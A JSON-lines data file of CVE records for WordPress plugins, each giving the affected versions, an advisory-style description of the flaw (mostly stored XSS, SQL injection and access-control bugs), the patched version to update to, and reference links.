{"CVE_ID":"CVE-2025-7496","slug":"woo-smart-compare","versionImpact":"6.4.7","versionEndExcluding":"6.4.8","description":"The WPC Smart Compare for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via DOM elements in all versions up to, and including, 6.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340004%40woo-smart-compare&new=3340004%40woo-smart-compare&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340004%40woo-smart-compare&new=3340004%40woo-smart-compare&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c01f7892-5ca2-4bc8-91c2-dfebb685aff8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c01f7892-5ca2-4bc8-91c2-dfebb685aff8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3492","slug":"events-manager","versionImpact":"6.4.7.3","versionEndExcluding":"6.4.8","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'event', 'location', and 'event_category' shortcodes in all versions up to, and including, 6.4.7.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a767f65e-bc7d-4576-af78-b77bd23dc089?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a767f65e-bc7d-4576-af78-b77bd23dc089?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101326\\\/events-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101326\\\/events-manager\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9838","slug":"wp-auto-affiliate-links","versionImpact":"6.4.6","versionEndExcluding":"6.4.7","description":"The Auto Affiliate Links WordPress plugin before 6.4.7 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 6.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cc0ff78-b310-40a4-899c-15fecbb345c5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cc0ff78-b310-40a4-899c-15fecbb345c5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5530","slug":"woo-smart-compare","versionImpact":"6.4.6","versionEndExcluding":"6.4.7","description":"The WPC Smart Compare for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shortcode_btn' shortcode in all versions up to, and including, 6.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-smart-compare\\\/tags\\\/6.4.5\\\/wpc-smart-compare.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-smart-compare\\\/tags\\\/6.4.5\\\/wpc-smart-compare.php#L187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-smart-compare\\\/tags\\\/6.4.5\\\/wpc-smart-compare.php#L2616\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-smart-compare\\\/tags\\\/6.4.5\\\/wpc-smart-compare.php#L2616\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3318565%40woo-smart-compare&new=3318565%40woo-smart-compare&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3318565%40woo-smart-compare&new=3318565%40woo-smart-compare&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bd09891-8117-43b1-8744-8f3773971540?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bd09891-8117-43b1-8744-8f3773971540?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9873","slug":"peepso-core","versionImpact":"6.4.6.1","versionEndExcluding":"6.4.6.2","description":"The Community by PeepSo \u2013 Social Network, Membership, Registration, User Profiles, Premium \u2013 Mobile App plugin for WordPress is vulnerable to Stored Cross-Site Scripting via URLs in posts, comments, and profiles when Markdown support is enabled in all versions up to, and including, 6.4.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33585791-be40-438c-bebc-8852e7cf8ae5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33585791-be40-438c-bebc-8852e7cf8ae5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168989\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/peepso.php?old=3157925&old_path=peepso-core%2Ftags%2F6.4.6.1%2Fpeepso.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168989\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/peepso.php?old=3157925&old_path=peepso-core%2Ftags%2F6.4.6.1%2Fpeepso.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8988","slug":"peepso-files","versionImpact":"6.4.6.0","versionEndExcluding":"6.4.6.1","description":"The PeepSo Core: File Uploads plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.4.6.0 via the file_download REST API endpoint due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to download files uploaded by others users and expose potentially sensitive information.","recommendation":"Update to version 6.4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3184996-655c-41d5-a3c5-6b36fbff58dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3184996-655c-41d5-a3c5-6b36fbff58dc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9017","slug":"peepso-groups","versionImpact":"6.4.6.0","versionEndExcluding":"6.4.6.1","description":"The PeepSo Core: Groups plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Group Description field in all versions up to, and including, 6.4.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32ac79f4-ada7-4c14-8675-53f8375912d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32ac79f4-ada7-4c14-8675-53f8375912d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5970","slug":"maxgalleria","versionImpact":"6.4.4","versionEndExcluding":"6.4.5","description":"The MaxGalleria plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's maxgallery_thumb shortcode in all versions up to, and including, 6.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0bb1036-3e45-4ac9-b920-3b9629a3a724?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0bb1036-3e45-4ac9-b920-3b9629a3a724?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxgalleria\\\/tags\\\/6.4.4\\\/maxgalleria-shortcode-thumb.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxgalleria\\\/tags\\\/6.4.4\\\/maxgalleria-shortcode-thumb.php#L45\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5527","slug":"business-directory-plugin","versionImpact":"6.4.3","versionEndExcluding":"6.4.4","description":"The Business Directory Plugin plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 6.4.3 via the class-csv-exporter.php file. This allows authenticated attackers, with author-level permissions and above, to embed untrusted input into CSV files exported by administrators, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.","recommendation":"Update to version 6.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed037e94-68b4-4efc-9d1a-fffc4aff1c45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed037e94-68b4-4efc-9d1a-fffc4aff1c45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/class-csv-exporter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/class-csv-exporter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/helpers\\\/csv\\\/class-csv-exporter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/helpers\\\/csv\\\/class-csv-exporter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102475\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/helpers\\\/csv\\\/class-csv-exporter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102475\\\/business-directory-plugin\\\/trunk\\\/includes\\\/admin\\\/helpers\\\/csv\\\/class-csv-exporter.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3581","slug":"maxgalleria","versionImpact":"6.4.2","versionEndExcluding":"6.4.3","description":"The MaxGalleria plugin for WordPress is vulnerable to unauthorized image upload due to a missing capability check on the add_media_library_images_to_gallery function in all versions up to, and including, 6.4.2. This makes it possible for authenticated attackers, with subscriber access or above, to upload arbitrary images to a gallery.","recommendation":"Update to version 6.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0629798c-ede2-43ac-9ec4-2cd99cd34ae2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0629798c-ede2-43ac-9ec4-2cd99cd34ae2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxgalleria\\\/trunk\\\/maxgalleria-image-gallery.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maxgalleria\\\/trunk\\\/maxgalleria-image-gallery.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070919%40maxgalleria%2Ftrunk&old=3059014%40maxgalleria%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070919%40maxgalleria%2Ftrunk&old=3059014%40maxgalleria%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4443","slug":"business-directory-plugin","versionImpact":"6.4.2","versionEndExcluding":"6.4.3","description":"The Business Directory Plugin \u2013 Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018listingfields\u2019 parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 6.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/982fb304-08d6-4195-97a3-f18e94295492?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/982fb304-08d6-4195-97a3-f18e94295492?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/fields\\\/class-fieldtypes-select.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/business-directory-plugin\\\/trunk\\\/includes\\\/fields\\\/class-fieldtypes-select.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089626\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089626\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-54940","slug":"advanced-custom-fields","versionImpact":"6.4.2","versionEndExcluding":"6.4.3","description":"An HTML injection vulnerability exists in WordPress plugin \"Advanced Custom Fields\" prior to 6.4.3. If this vulnerability is exploited, crafted HTML code may be rendered and page display may be tampered.","recommendation":"Update to version 6.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN21048820\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN21048820\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.advancedcustomfields.com\\\/blog\\\/acf-6-4-3-security-release\\\/\",\"name\":\"https:\\\/\\\/www.advancedcustomfields.com\\\/blog\\\/acf-6-4-3-security-release\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2571","slug":"quiz-maker","versionEndExcluding":"6.4.2.7","description":"The Quiz Maker WordPress plugin before 6.4.2.7 does not escape some parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2dc02e5c-1c89-4053-a6a7-29ee7b996183\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2dc02e5c-1c89-4053-a6a7-29ee7b996183\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28788","slug":"advanced-page-visit-counter","versionEndExcluding":"6.4.2.1","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Page Visit Counter Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress.This issue affects Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress: from n\/a through 6.4.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-6-4-2-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-6-4-2-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13207","slug":"facebook-pagelike-widget","versionImpact":"6.4.1","versionEndExcluding":"6.4.2","description":"The Widget for Social Page Feeds WordPress plugin before 6.4.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 6.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3e27fa2-b6dd-48eb-83ec-99dc034eff38\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3e27fa2-b6dd-48eb-83ec-99dc034eff38\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1069","slug":"complianz-gdpr","versionEndExcluding":"6.4.2","description":"The Complianz WordPress plugin before 6.4.2, Complianz Premium WordPress plugin before 6.4.2 do not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/caacc50c-822e-46e9-bc0b-681349fd0dda\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/caacc50c-822e-46e9-bc0b-681349fd0dda\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13887","slug":"business-directory-plugin","versionImpact":"6.4.14","versionEndExcluding":"6.4.15","description":"The Business Directory Plugin \u2013 Easy Listing Directories for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.4.14 via the 'ajax_listing_submit_image_upload' function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to add arbitrary images to listings.","recommendation":"Update to version 6.4.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249927\\\/business-directory-plugin\\\/trunk\\\/includes\\\/class-wpbdp.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249927\\\/business-directory-plugin\\\/trunk\\\/includes\\\/class-wpbdp.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06c3de6d-92e7-46f8-86a9-37f027767fc0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06c3de6d-92e7-46f8-86a9-37f027767fc0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0427","slug":"UNKNOWN-CVE-2024-4620-1","versionImpact":"6.4.0","versionEndExcluding":"6.4.1","description":"The ARForms - Premium WordPress Form Builder Plugin WordPress plugin before 6.4.1 does not properly escape user-controlled input when it is reflected in some of its AJAX actions.","recommendation":"Update to version 6.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1806fef3-d774-46e0-aa48-7a101495f4eb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1806fef3-d774-46e0-aa48-7a101495f4eb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4180","slug":"the-events-calendar","versionImpact":"6.4.0","versionEndExcluding":"6.4.0.1","description":"The Events Calendar WordPress plugin before 6.4.0.1 does not properly sanitize user-submitted content when rendering some views via AJAX.","recommendation":"Update to version 6.4.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2a92316-e404-4a5e-8426-f88df6e87550\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2a92316-e404-4a5e-8426-f88df6e87550\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4474","slug":"easy-facebook-likebox","versionEndExcluding":"6.4.0","description":"The Easy Social Feed WordPress plugin before 6.4.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3acc6940-13ec-40fb-8471-6b2f0445c543\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3acc6940-13ec-40fb-8471-6b2f0445c543\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2075","slug":"uncanny-automator","versionImpact":"6.3.0.2","versionEndExcluding":"6.4.0","description":"The Uncanny Automator \u2013 Easy Automation, Integration, Webhooks & Workflow Builder Plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.3.0.2. This is due to add_role() and user_role() functions missing proper capability checks performed through the validate_rest_call() function. This makes it possible for unauthenticated attackers to set the role of arbitrary users to administrator granting full access to the site, though privilege escalation requires an active account on the site so this is considered an authenticated privilege escalation.","recommendation":"Update to version 6.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257300\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/classes\\\/class-background-actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257300\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/classes\\\/class-background-actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3265280\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/classes\\\/class-background-actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3265280\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/classes\\\/class-background-actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b4b0d6-bda2-47f3-a0b5-9733cb7a11f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b4b0d6-bda2-47f3-a0b5-9733cb7a11f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4458","slug":"modern-events-calendar-lite","versionImpact":"6.3.0","versionEndExcluding":"6.4.0","description":"The Modern Events Calendar Lite plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the 'wp_ajax_mec_load_single_page' AJAX action in all versions up to, and including, 6.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is only exploitable on sites with addslashes disabled.","recommendation":"Update to version 6.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2683727\\\/modern-events-calendar-lite\\\/trunk\\\/app\\\/libraries\\\/render.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2683727\\\/modern-events-calendar-lite\\\/trunk\\\/app\\\/libraries\\\/render.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/703ba736-5834-40f2-9cf6-a6a70a73e4d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/703ba736-5834-40f2-9cf6-a6a70a73e4d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3821","slug":"wpdatatables","versionImpact":"6.3.2","versionEndExcluding":"6.4","description":"The wpDataTables \u2013 WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions in the wdt_ajax_actions.php file in all versions up to, and including, 6.3.2. This makes it possible for unauthenticated attackers to manipulate data tables. Please note this only affects the premium version of the plugin.","recommendation":"Update to version 6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d32215b5-9ecb-4feb-b76f-18821184dd8b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d32215b5-9ecb-4feb-b76f-18821184dd8b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpdatatables.com\\\/help\\\/whats-new-changelog\\\/\",\"name\":\"https:\\\/\\\/wpdatatables.com\\\/help\\\/whats-new-changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0973","slug":"facebook-pagelike-widget","versionImpact":"6.3","versionEndExcluding":"6.4","description":"The Widget for Social Page Feeds WordPress plugin before 6.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/798de421-4814-46a9-a055-ebb95a7218ed\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/798de421-4814-46a9-a055-ebb95a7218ed\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45607","slug":"wordpress-popular-posts","versionEndExcluding":"6.3.3","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Hector Cabrera WordPress Popular Posts plugin <=\u00a06.3.2 versions.","recommendation":"Update to version 6.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-popular-posts\\\/wordpress-popular-posts-plugin-6-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-popular-posts\\\/wordpress-popular-posts-plugin-6-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13567","slug":"awesome-support","versionImpact":"6.3.1","versionEndExcluding":"6.3.2","description":"The Awesome Support \u2013 WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.3.1 via the 'awesome-support' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/awesome-support directory which can contain file attachments included in support tickets. The vulnerability was partially patched in version 6.3.1.","recommendation":"Update to version 6.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/file-uploader\\\/class-file-uploader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/file-uploader\\\/class-file-uploader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250497\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250497\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262629\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262629\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24c54ef5-ad02-4767-bca6-f74c539d3068?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24c54ef5-ad02-4767-bca6-f74c539d3068?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
